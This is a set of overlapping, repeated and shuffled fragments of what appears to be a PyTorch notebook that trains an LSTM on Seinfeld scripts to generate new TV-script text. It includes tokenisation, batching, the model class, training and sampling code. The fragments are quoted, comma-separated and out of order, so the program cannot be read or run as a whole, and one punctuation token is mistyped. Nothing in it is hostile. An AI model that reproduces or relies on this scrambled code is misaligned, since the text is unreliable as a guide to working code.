= torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() # training", "optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training for %d epoch(s)...\" %", "print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers,", "predict_len=100): \"\"\" Generate text using the neural network :param decoder: The PyTorch Module", "train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader", "data \"\"\" n_batches = len(words)//batch_size words = words[:n_batches*batch_size] features = [] targets =", "loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the loss over a batch and the", "forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) # record loss batch_losses.append(loss) # printing loss", "DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader return train_loader int_text, vocab_to_int, int_to_vocab, token_dict", "The input to the neural network :param hidden: The hidden state :return: Two", "gen_sentences # run the cell multiple times to get different results! gen_length =", "create model and move to gpu if available rnn = RNN(vocab_size, output_size, embedding_dim,", "in data import helper import numpy as np import torch import torch.nn as", "where the key is the punctuation and the value is the token \"\"\"", "Rate learning_rate = 0.001 # Model parameters # Vocab size vocab_size = len(vocab_to_int)", "len(vocab_to_int) # Output size output_size = vocab_size # Embedding Dimension embedding_dim = 128", "punctuation into a token. :return: Tokenized dictionary where the key is the punctuation", "the first prediction :param int_to_vocab: Dict of word id keys to word values", "of the neural network and the latest hidden state \"\"\" batch_size = nn_input.size(0)", "vocab_size = len(vocab_to_int) # Output size output_size = vocab_size # Embedding Dimension embedding_dim", "hidden state produced by our model return loss.item(), h def train_rnn(rnn, batch_size, optimizer,", "';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n':", "that holds the neural network :param decoder_optimizer: The PyTorch optimizer for the neural", "# returns a trained rnn return rnn # Data params # Sequence Length", "hidden state :return: Two Tensors, the output of the neural network and the", "= 128 # Hidden Dimension hidden_dim = 512 # Number of RNN Layers", "found. Please use a GPU to train your neural network.') def create_lookup_tables(text): \"\"\"", "epoch_i in range(1, n_epochs + 1): # initialize hidden state hidden = rnn.init_hidden(batch_size)", "Implement function weight = next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers,", "weight = next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda())", "available if train_on_gpu: inp, target = inp.cuda(), target.cuda() # perform backpropagation and optimization", "print(\"Training for %d epoch(s)...\" % n_epochs) for epoch_i in range(1, n_epochs + 1):", "= DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader return train_loader int_text, vocab_to_int, int_to_vocab,", "state :return: hidden state of dims (n_layers, batch_size, hidden_dim) ''' # Implement function", "# Implement function weight = next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(),", "int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using the neural network :param decoder:", "[] targets = [] total = len(words)-sequence_length for idx in range(0, total): x", "\"current sequence\" and the cycle can continue current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1]", "')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length,", "TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for a GPU", "output dimensions of the neural network :param embedding_dim: The size of embeddings, should", "state :return: Two Tensors, the output of the neural network and the latest", "lookup tables for vocabulary :param text: The text of tv scripts split into", "inp.cuda(), target.cuda() # perform backpropagation and optimization h = tuple([each.data for each in", "parameters # Vocab size vocab_size = len(vocab_to_int) # Output size output_size = vocab_size", "GPU to train your neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables for", "5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() # select the likely next", "optimizer, criterion, inputs, labels, hidden) # record loss batch_losses.append(loss) # printing loss stats", "= 400 # modify the length to your preference prime_word = 'jerry' #", "weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return", "self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc =", "Please use a GPU to train your neural network.') def create_lookup_tables(text): \"\"\" Create", "create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param text: The text of tv", "input to the neural network :param hidden: The hidden state :return: Two Tensors,", "loss and optimization functions for training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss()", "state of dims (n_layers, batch_size, hidden_dim) ''' # Implement function weight = next(self.parameters()).data", "word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that word from the dictionary word =", "model and move to gpu if available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim,", "as F def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using", "8 # of words in a sequence # Batch Size batch_size = 100", "data to GPU, if available if train_on_gpu: inp, target = inp.cuda(), target.cuda() #", "THAT IS BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word", "nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def", "vocab_to_int = {word: ii for ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def", "current_seq[-1][-1] = word_i gen_sentences = ' '.join(predicted) # Replace punctuation tokens for key,", "the sentences return gen_sentences # run the cell multiple times to get different", "'(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def", "probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu() # move to cpu", "len(words)//batch_size words = words[:n_batches*batch_size] features = [] targets = [] total = len(words)-sequence_length", "Size batch_size = 100 # data loader - do not change train_loader =", "'||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural", "target = inp.cuda(), target.cuda() # perform backpropagation and optimization h = tuple([each.data for", "trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn =", "nn_input, hidden): \"\"\" Forward propagation of the neural network :param nn_input: The input", "to puncuation values :param pad_value: The value used to pad a sequence :param", "= RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss", "np.random.choice(top_i, p=p/p.sum()) # retrieve that word from the dictionary word = int_to_vocab[word_i] predicted.append(word)", "trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value,", "word id to start the first prediction :param int_to_vocab: Dict of word id", "using DataLoader :param words: The word ids of the TV scripts :param sequence_length:", "and the cycle can continue current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i", "hidden state of dims (n_layers, batch_size, hidden_dim) ''' # Implement function weight =", "np import torch import torch.nn as nn from string import punctuation from collections", "output_size) self.dropout = nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward propagation of the", "neural network :param embedding_dim: The size of embeddings, should you choose to use", "token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural network data using", "of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True)", "turn punctuation into a token. :return: Tokenized dictionary where the key is the", "n_epochs + 1): # initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs,", "text using the neural network :param decoder: The PyTorch Module that holds the", "size of embeddings, should you choose to use them :param hidden_dim: The size", "do not change train_loader = batch_data(int_text, sequence_length, batch_size) # Training parameters # Number", "likely next word index with some element of randomness p = p.numpy().squeeze() word_i", "= n_layers self.hidden_dim = hidden_dim # define model layers self.embedding = nn.Embedding(vocab_size, embedding_dim)", "gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('( ', '(') # return all the sentences", "= 8 # of words in a sequence # Batch Size batch_size =", "def init_hidden(self, batch_size): ''' Initialize the hidden state of an LSTM/GRU :param batch_size:", "start the first prediction :param int_to_vocab: Dict of word id keys to word", "every n number of batches show_every_n_batches = 500 # create model and move", "The word ids of the TV scripts :param sequence_length: The sequence length of", "(batch_size=1) with the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted", "text: The text of tv scripts split into words :return: A tuple of", "batches show_every_n_batches = 500 # create model and move to gpu if available", "optimizer for the neural network :param criterion: The PyTorch loss function :param inp:", "A tuple of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts,", "features = [] targets = [] total = len(words)-sequence_length for idx in range(0,", "generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using the neural network", "neural network :param decoder: The PyTorch Module that holds the trained neural network", "a token. :return: Tokenized dictionary where the key is the punctuation and the", "size of each batch; the number of sequences in a batch :return: DataLoader", "name for starting the script \"\"\" DON'T MODIFY ANYTHING IN THIS CELL THAT", "dropout: dropout to add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set", "your preference prime_word = 'jerry' # name for starting the script \"\"\" DON'T", "prime_id: The word id to start the first prediction :param int_to_vocab: Dict of", "the hidden state of an LSTM/GRU :param batch_size: The batch_size of the hidden", "rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining", "state produced by our model return loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion,", "times to get different results! gen_length = 400 # modify the length to", "hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size,", "perform backpropagation and optimization h = tuple([each.data for each in hidden]) rnn.zero_grad() output,", "cpu # use top_k sampling to get the index of the next word", "text = helper.load_data(data_dir) # Check for a GPU train_on_gpu = torch.cuda.is_available() if not", ":param hidden: The hidden state :return: Two Tensors, the output of the neural", "Forward and backward propagation on the neural network :param decoder: The PyTorch Module", "['\\n', '(', '\"'] else '' gen_sentences = gen_sentences.replace(' ' + token.lower(), key) gen_sentences", "Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses = [] # returns a trained rnn", "parameters # Number of Epochs num_epochs = 5 # Learning Rate learning_rate =", "== 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses = [] #", "pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu:", "' + token.lower(), key) gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('( ',", "train_loader int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module):", "'.join(predicted) # Replace punctuation tokens for key, token in token_dict.items(): ending = '", "import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for a", "to add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class variables", "data import helper import numpy as np import torch import torch.nn as nn", "word scores and the hidden state return x, h def init_hidden(self, batch_size): '''", "nn from string import punctuation from collections import Counter from torch.utils.data import TensorDataset,", "x = x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x = self.fc(x) x =", "self.hidden_dim) # x = self.dropout(x) x = self.fc(x) x = x.view(batch_size, -1, self.output_size)", "number of sequences in a batch :return: DataLoader with batched data \"\"\" n_batches", "criterion, inp, target, hidden): \"\"\" Forward and backward propagation on the neural network", "= {word: ii for ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup():", "gen_sentences.replace(' ' + token.lower(), key) gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('(", "= [] targets = [] total = len(words)-sequence_length for idx in range(0, total):", "nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the loss over a batch and the hidden", "%d epoch(s)...\" % n_epochs) for epoch_i in range(1, n_epochs + 1): # initialize", "batched data \"\"\" n_batches = len(words)//batch_size words = words[:n_batches*batch_size] features = [] targets", "\"\"\" super(RNN, self).__init__() # set class variables self.output_size = output_size self.n_layers = n_layers", "batch of output word scores and the hidden state return x, h def", "prop loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) # record loss", "of input :return: The loss and the latest hidden state Tensor \"\"\" #", "= 100 # data loader - do not change train_loader = batch_data(int_text, sequence_length,", "= output_size self.n_layers = n_layers self.hidden_dim = hidden_dim # define model layers self.embedding", "output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss and optimization", "len(words)-sequence_length for idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length]", "the vocabulary) :param output_size: The number of output dimensions of the neural network", "# the generated word becomes the next \"current sequence\" and the cycle can", ":param batch_size: The batch_size of the hidden state :return: hidden state of dims", "target.cuda() # perform backpropagation and optimization h = tuple([each.data for each in hidden])", "of the neural network :param embedding_dim: The size of embeddings, should you choose", "training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() # training the model trained_rnn", "batch_size=batch_size) # return a dataloader return train_loader int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()", "punctuation from collections import Counter from torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt'", "functions for training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() # training the", "ii for ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate", "of output word scores and the hidden state return x, h def init_hidden(self,", "hidden_dim = 512 # Number of RNN Layers n_layers = 2 # Show", "= nn.CrossEntropyLoss() # training the model trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs,", "# return one batch of output word scores and the hidden state return", "that holds the trained neural network :param prime_id: The word id to start", "batch of input to the neural network :param target: The target output for", "h = tuple([each.data for each in hidden]) rnn.zero_grad() output, h = rnn(inp, h)", "full batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches): break # forward, back", "F def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using the", "dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab", "retrieve that word from the dictionary word = int_to_vocab[word_i] predicted.append(word) # the generated", "size output_size = vocab_size # Embedding Dimension embedding_dim = 128 # Hidden Dimension", "int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii:", "with the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted =", "',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')':", "token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size,", "self.output_size) x = x[:, -1] # return one batch of output word scores", "\"\"\" rnn.eval() # create a sequence (batch_size=1) with the prime_id current_seq = np.full((1,", "prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using the neural network :param", "Replace punctuation tokens for key, token in token_dict.items(): ending = ' ' if", "tables for vocabulary :param text: The text of tv scripts split into words", "= gen_sentences.replace('( ', '(') # return all the sentences return gen_sentences # run", "the next word top_k = 5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze()", "word for ii, word in enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii, word", "for starting the script \"\"\" DON'T MODIFY ANYTHING IN THIS CELL THAT IS", "add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class variables self.output_size", "Module that holds the neural network :param decoder_optimizer: The PyTorch optimizer for the", "The hidden state :return: Two Tensors, the output of the neural network and", "of word id keys to word values :param token_dict: Dict of puncuation tokens", "trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict =", "# create model and move to gpu if available rnn = RNN(vocab_size, output_size,", "output_size = vocab_size # Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim", "the next word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu() #", "with some element of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) #", "= nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward propagation of the neural network", "self.dropout(x) x = self.fc(x) x = x.view(batch_size, -1, self.output_size) x = x[:, -1]", "neural network :param decoder: The PyTorch Module that holds the neural network :param", "the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]]", "class variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim # define", "hidden state :return: hidden state of dims (n_layers, batch_size, hidden_dim) ''' # Implement", "= torch.cuda.is_available() if not train_on_gpu: print('No GPU found. Please use a GPU to", "'./data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for a GPU train_on_gpu = torch.cuda.is_available() if", "[int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq =", "RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss and", "output, _ = rnn(current_seq, hidden) # get the next word probabilities p =", "of the rnn output, _ = rnn(current_seq, hidden) # get the next word", "set class variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim #", "= vocab_size # Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim =", "of an LSTM/GRU :param batch_size: The batch_size of the hidden state :return: hidden", "embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size: The", "'||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir,", "Length sequence_length = 8 # of words in a sequence # Batch Size", "of the neural network :param nn_input: The input to the neural network :param", "the rnn output, _ = rnn(current_seq, hidden) # get the next word probabilities", "all the sentences return gen_sentences # run the cell multiple times to get", "n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size: The number of", "= p.cpu() # move to cpu # use top_k sampling to get the", "x = self.embedding(nn_input) x,h = self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x", "= helper.load_data(data_dir) # Check for a GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu:", "text to generate :return: The generated text \"\"\" rnn.eval() # create a sequence", "for vocabulary :param text: The text of tv scripts split into words :return:", "values :param pad_value: The value used to pad a sequence :param predict_len: The", "train your neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param", "\"\"\" Generate a dict to turn punctuation into a token. :return: Tokenized dictionary", "dict to turn punctuation into a token. :return: Tokenized dictionary where the key", "# return the loss over a batch and the hidden state produced by", "and backward propagation on the neural network :param decoder: The PyTorch Module that", "Hidden Dimension hidden_dim = 512 # Number of RNN Layers n_layers = 2", "target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the loss over a batch and", "range(0, total): x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features)", "\"\"\" return { '.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||',", "sampling to get the index of the next word top_k = 5 p,", "network :param target: The target output for the batch of input :return: The", "# forward, back prop loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)", "to pad a sequence :param predict_len: The length of text to generate :return:", "x = self.dropout(x) x = self.fc(x) x = x.view(batch_size, -1, self.output_size) x =", "with batched data \"\"\" n_batches = len(words)//batch_size words = words[:n_batches*batch_size] features = []", "word from the dictionary word = int_to_vocab[word_i] predicted.append(word) # the generated word becomes", "show_every_n_batches = 500 # create model and move to gpu if available rnn", "Initialize the hidden state of an LSTM/GRU :param batch_size: The batch_size of the", "p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() # select the likely next word", "top_k = 5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() # select the", "tuple of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get,", "hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size: The number", "= helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim,", "torch.LongTensor(current_seq) # initialize the hidden state hidden = rnn.init_hidden(current_seq.size(0)) # get the output", "the neural network :param hidden: The hidden state :return: Two Tensors, the output", "# move data to GPU, if available if train_on_gpu: inp, target = inp.cuda(),", "of input to the neural network :param target: The target output for the", "(n_layers, batch_size, hidden_dim) ''' # Implement function weight = next(self.parameters()).data if (train_on_gpu): hidden", "vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict to turn punctuation into a", "record loss batch_losses.append(loss) # printing loss stats if batch_i % show_every_n_batches == 0:", "Batch the neural network data using DataLoader :param words: The word ids of", "= batch_data(int_text, sequence_length, batch_size) # Training parameters # Number of Epochs num_epochs =", "rnn.eval() # create a sequence (batch_size=1) with the prime_id current_seq = np.full((1, sequence_length),", "if key in ['\\n', '(', '\"'] else '' gen_sentences = gen_sentences.replace(' ' +", "output_size: The number of output dimensions of the neural network :param embedding_dim: The", "int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict to turn punctuation", "batch_size, hidden_dim) ''' # Implement function weight = next(self.parameters()).data if (train_on_gpu): hidden =", "= x.view(batch_size, -1, self.output_size) x = x[:, -1] # return one batch of", "hidden) x = x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x = self.fc(x) x", "number of input dimensions of the neural network (the size of the vocabulary)", "of text to generate :return: The generated text \"\"\" rnn.eval() # create a", "# Batch Size batch_size = 100 # data loader - do not change", "The value used to pad a sequence :param predict_len: The length of text", "the latest hidden state Tensor \"\"\" # move data to GPU, if available", "self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def", "rnn(current_seq, hidden) # get the next word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu):", "nn_input: The input to the neural network :param hidden: The hidden state :return:", ":param int_to_vocab: Dict of word id keys to word values :param token_dict: Dict", "# training the model trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches) #", "self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())", ":param output_size: The number of output dimensions of the neural network :param embedding_dim:", "the model trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches) # saving the", "MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE \"\"\" pad_word =", ":param dropout: dropout to add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() #", "(weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers,", "# get the output of the rnn output, _ = rnn(current_seq, hidden) #", "get different results! gen_length = 400 # modify the length to your preference", "sequences in a batch :return: DataLoader with batched data \"\"\" n_batches = len(words)//batch_size", "embeddings, should you choose to use them :param hidden_dim: The size of the", "network.') def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param text: The text", "of embeddings, should you choose to use them :param hidden_dim: The size of", "in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) # initialize", "for each in hidden]) rnn.zero_grad() output, h = rnn(inp, h) loss = criterion(output,", "n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training for %d epoch(s)...\" % n_epochs) for", "cell multiple times to get different results! gen_length = 400 # modify the", "value is the token \"\"\" return { '.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||',", "current_seq = torch.LongTensor(current_seq) # initialize the hidden state hidden = rnn.init_hidden(current_seq.size(0)) # get", "' ' if key in ['\\n', '(', '\"'] else '' gen_sentences = gen_sentences.replace('", "loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) # record loss batch_losses.append(loss)", "\"\"\" Batch the neural network data using DataLoader :param words: The word ids", "THIS CELL THAT IS BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script =", "Counter from torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) #", "'||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words,", "= len(vocab_to_int) # Output size output_size = vocab_size # Embedding Dimension embedding_dim =", "choose to use them :param hidden_dim: The size of the hidden layer outputs", "criterion, num_epochs, show_every_n_batches) # saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and", "the key is the punctuation and the value is the token \"\"\" return", "idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x", "= sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)}", "n_layers = 2 # Show stats for every n number of batches show_every_n_batches", "criterion = nn.CrossEntropyLoss() # training the model trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion,", "The PyTorch loss function :param inp: A batch of input to the neural", "key=word_counts.get, reverse=True) int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)} vocab_to_int =", ":param decoder: The PyTorch Module that holds the trained neural network :param prime_id:", "0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses = [] # returns", "[] total = len(words)-sequence_length for idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x)", "= 500 # create model and move to gpu if available rnn =", "from collections import Counter from torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text", "# return a dataloader return train_loader int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict)", "= rnn(inp, h) loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return", "epoch(s)...\" % n_epochs) for epoch_i in range(1, n_epochs + 1): # initialize hidden", "hidden: The hidden state :return: Two Tensors, the output of the neural network", "import punctuation from collections import Counter from torch.utils.data import TensorDataset, DataLoader data_dir =", "[] rnn.train() print(\"Training for %d epoch(s)...\" % n_epochs) for epoch_i in range(1, n_epochs", "neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param text: The", "def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden): \"\"\" Forward and backward propagation on", "ending = ' ' if key in ['\\n', '(', '\"'] else '' gen_sentences", "- do not change train_loader = batch_data(int_text, sequence_length, batch_size) # Training parameters #", "network :param hidden: The hidden state :return: Two Tensors, the output of the", "embedding_dim: The size of embeddings, should you choose to use them :param hidden_dim:", "network :param criterion: The PyTorch loss function :param inp: A batch of input", "inp: A batch of input to the neural network :param target: The target", "script \"\"\" DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE", "# Replace punctuation tokens for key, token in token_dict.items(): ending = ' '", "batch_size): ''' Initialize the hidden state of an LSTM/GRU :param batch_size: The batch_size", "params # Sequence Length sequence_length = 8 # of words in a sequence", "and optimization functions for training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() #", "Dict of puncuation tokens keys to puncuation values :param pad_value: The value used", 